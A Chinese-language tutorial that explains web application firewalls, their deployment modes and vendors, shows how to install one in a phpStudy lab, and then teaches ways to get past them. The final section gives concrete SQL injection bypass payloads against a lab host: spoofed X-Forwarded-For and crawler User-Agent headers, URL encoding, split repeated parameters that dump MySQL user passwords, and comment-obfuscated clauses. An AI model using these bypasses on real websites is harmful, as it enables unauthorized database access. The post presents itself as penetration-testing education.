网站WAF是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能等模块。能够为用户提供实时的网站安全防护,避免各类针对网站的攻击所带来的危害。
一、WAF简介
WAF的全称是(Web Application Firewall)即Web应用防火墙,简称WAF。
网站WAF是一款服务器安全防护软件,是为IDC运营商、虚拟主机服务商、企业主机、服务器管理者等用户提供服务器安全防范的实用系统,是集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。
常见的系统攻击分为两类:
一是利用Web服务器的漏洞进行攻击,如DDOS攻击、病毒木马破坏等攻击;
二是利用网页自身的安全漏洞进行攻击,如SQL注入攻击、跨站脚本攻击等。常见攻击方式对网站服务器带来的危害主要集中在病毒木马破坏、网页非法篡改、各类网络攻击带来的威胁。
二、WAF主要功能
网马木马主动防御及查杀
网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90%
流量监控
能够实时监测到每个网站的进出流量和总流量,以及每个应用程序池及网站的CPU占用情况
网站漏洞防御功能
可拦截GET、POST、COOKIES等方式的SQL注入,可对GET、POST、COOKIES分别定义特征码,以及可拦截XSS注入等行为。
危险组件防护功能
全面拦截恶意代码对组件的调用权限,拦截IIS执行恶意程序,保护网站安全
.Net安全保护模块
快捷设置.Net安全模式,禁止.Net执行系统敏感函数,保障网站安全
双层防盗链链接模式
可以针对不同站点设置防盗链的过滤, 防止图片、桌面、软件、音乐、电影被人引用。如果发现请求者是盗用网站链接, 则自动重定向到错误处理页面
网站特定资源防下载
支持对doc、mdb、mdf、myd等特定资源的防下载保护,加入要保护的敏感资料的路径,即可防止敏感资料被下载
CC攻击防护
自主研发的独特抗攻击算法,高效的主动防御系统可有效防御CC攻击、流量攻击。
网站流量保护
支持下载流量控制、下载线程控制。采用独创的线程控制和流量控制技术, 大大提高服务器性能, 保护网站流量。
IP黑白名单
全IP黑白名单功能允许用户设置个性化的IP信任列表,直接屏蔽或者允许指定IP访问网站。同时,增加iP临时黑名单功能,以及实现了针对某个功能的iP白名单功能。同时,爬虫白名单提供爬虫信任机制,在出现误拦截情况下,允许用户自定义爬虫信任。
三、WAF的多种部署模式(了解)
WAF一般支持透明代理,反向代理,旁路监控,桥模式部署模式。
3.1、透明代理串接模式:
透明代理串接模式是采用最多的部署模式,防御效果好。
透明代理部署模式支持透明串接部署方式。串接在用户网络中,可实现即插即用,无需用户更改网络设备与服务器配置。部署简单易用,应用于大部分用户网络中。
部署特点:
- 不需要改变用户网络结构,对于用户而言是透明的
- 安全防护性能强
- 故障恢复快,可支持Bypass
3.2、旁路监控模式:
采用旁路监听模式,在交换机做服务器端口镜像,将流量复制一份到WAF上,部署时不影响在线业务。在旁路模式下WAF只会进行告警而不阻断。
3.3、反向代理模式:
反向代理又分为两种模式,反向代理(代理模式)与反向代理(牵引模式)。
3.3.1、代理模式:
当外网去访问www.xxx.com时,会解析到110.1.1.1。在网络防火墙FW上,会通过nat-server技术,将110.1.1.1外网地址解析为192.168.1.1的内网地址。而192.168.1.1为WAF的业务口地址,WAF会去访问后端服务器192.168.1.100,将包返回给WAF,WAF再返回给用户,起到了代理作用,隐藏了真正的Web服务器地址。
部署特点:
- 可旁路部署,对于用户网络不透明,防护能力强
- 故障恢复时间慢,不支持Bypass,恢复时需要重新将域名或地址映射到原服务器。
- 此模式应用于复杂环境中,如设备无法直接串接的环境。
- 访问时需要先访问WAF配置的业务口地址。
- 支持VRRP主备
3.3.2、 牵引模式:
WAF采用反向代理模式以旁路的方式接入到网络环境中,需要在核心交换机上做策略路由PBR,将客户端访问服务器的流量牵引到WAF上,策略路由的下一跳地址为WAF的业务口地址。
部署特点:
- 可旁路部署,对于用户网络不透明。
- 故障恢复时间慢,不支持Bypass,恢复时需要删除路由器策略路由配置。
- 此模式应用于复杂环境中,如设备无法直接串接的环境。
- 访问时仍访问网站服务器
3.4、透明桥模式:
透明桥模式是真正意义上的纯透明,不会改变更改数据包任何内容,比如源端口、TCP序列号,桥模式不跟踪TCP会话,可支持路由不对称环境。
四、防火墙与waf区别**:
简单来说:
4.1、防火墙主要关注网络层的防护,提供基础的访问控制。
4.2、Waf(Web应用程序防火墙)主要用于应用层防护,识别并阻止针对Web应用的特定攻击(如SQL注入、跨站脚本攻击等)
五、市场Waf分类
5.1硬件Waf:
绿盟、安恒、启明、知道创宇等
5.2软件Waf:
安全狗、云锁、中间件自带的Waf模块等
5.3云WAF:
阿里云、安全狗、知道创宇、安恒等
六、安全狗安装
软件waf安全狗安装步骤:
运行cmd,cd进入apache/bin文件夹目录
cd C:\phpStudy\Apache\bin
执行httpd.exe -k install -n apache2.4.39
httpd.exe -k install -n apache2.4.39
打开apache,打开安全狗安装包进行安装:
安装完成后点击安装安全狗插件:
点击确认:
安装过程不动,任务管理器结束任务,重启软件显示已安装。
然后注册登录,正常使用:
打开访问mysql靶场环境,url填写插入sql注入语句:
http://10.0.0.101:90/mysql/sql.php?id=1 and 1=2
waf已生效。(未生效重启phpstudy)
注:拦截规则库:网站防护-漏洞防护设置里
七、WAF的检测方法
首先白名单黑名单身份认证--数据包解析--规则判断--拦截
八、Waf注入绕过方法
8.1、burp安装waf模块
云WAF绕过方法:伪造XFF头为127.0.0.1或找出真实IP绕过
bp安装【Bypass WAF】插件:配置插件
访问mysql靶场环境。bp抓包:
http://10.0.0.101:90/mysql/sql.php?id=1
放到重发器,发送请求包,请求包会自动添加127.0.0.1:
尝试url随机加空格进行绕过,等:
8.2、通过工具伪造百度、google等user agent头或者伪造白名单特殊目录
常用搜索引擎User-Agent头指纹信息;
百度User-Agent头:
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Google User-Agent头:
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
360搜索User-Agent头:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0);
雅虎中国User-Agent头:
“Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)”
搜狗User-Agent头:
“Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)”
Internet Explorer 8User-Agent头:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
也可以用火狐浏览器获取User-Agent头:
--------------------------
bp抓包批量替换为搜索引擎User_Agent头信息,来实现绕过:
8.3、WAF数据包解析阶段的绕过
(1)编码绕过
最常见的方法之一,可以进行urlencode
如:
http://10.0.0.101:90/mysql/sql.php?id=1 && 1=1
url编码:
http://10.0.0.101:90/mysql/sql.php?id=1%20%26%26%201=1
早期的方法,现在效果不是太好
(2)修改请求方式绕过
因wsf默认检测url对get请求拦截;cookie和post请求默认不开启,利用这一特点,修改请求方式绕过
(3)复参数绕过
例如一个请求是这样的
GET /pen/news.php?id=1 union select user,password from mysql.user
可以修改为
GET pen/news.php?id=1&id=union&id=select&id=user,password&id=from%20mysql.user
很多WAF都可以这样绕,测试最新版WAF能绕过部分语句
如:
http://10.0.0.101:90/mysql/sql.php?id=1 and 1=2
修改为:
http://10.0.0.101:90/mysql/sql.php?id=1&id=1=2
(4)WAF触发规则的绕过
WAF在这里主要是针对一些特殊的关键词或者用法进行检测。绕过方法很多,也是最有效的。
绕过策略一:特殊字符替换空格
用一些特殊字符代替空格,比如在mysql中%0a是换行,可以代替空格,这个方法也可以部分绕过最新版本的WAF,在sqlserver中可以用/**/代替空格,也可以使用如下方法:
如:
http://10.0.0.101:90/mysql/sql.php?id=1 and 1=1
修改为:
http://10.0.0.101:90/mysql/sql.php?id=1/*|%23--%23|*/and/*|%23--%23|*/-1=-1
测试:
http://10.0.0.101:90/mysql/sql.php?id=1/*|%23--%23|*/and/*|%23--%23|*/-1=-2
说明: /*|%23--%23|*/代替空格;-1代替1(1被waf拦截)
/|%23--%23|/ 的作用: 这串字符是通过编码和特殊符号组合来尝试模拟空格或分隔符。在SQL语句中,正常的空格会被用来分隔关键字和参数。但是,当直接使用空格或被WAF识别的常见分隔符时,可能会触发WAF的防护规则。因此,攻击者使用
/*
开始一个多行注释,接着是URL编码的%23
(代表#
),#
在SQL中用于开始单行注释,最后再用*/
尝试结束之前可能未闭合的注释,形成一种混淆,企图让WAF误判或忽略这部分内容。|
字符在这里可能被用作自定义的分隔符,尝试在某些情况下绕过规则。-1代替1: 这种替换是为了规避WAF对特定数值或模式的直接拦截。如果WAF被配置为阻止特定查询模式,比如查询字符串中包含数字
1
可能被认为是潜在的攻击尝试(例如,在尝试枚举数据库时),攻击者会尝试使用其他值或表达式来达到相同目的,同时避免触发WAF的警报。使用-1=-2
这样的逻辑表达式,目的是使整个条件始终为假,它的真正意图是测试注入点的有效性,而非执行有效的数据库查询。
-----------------
感谢您阅读至此,更多精彩的内容将在下一篇文章中展开,请继续关注。
声明:
- 此文章只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试留言私信,如有侵权请联系小编处理。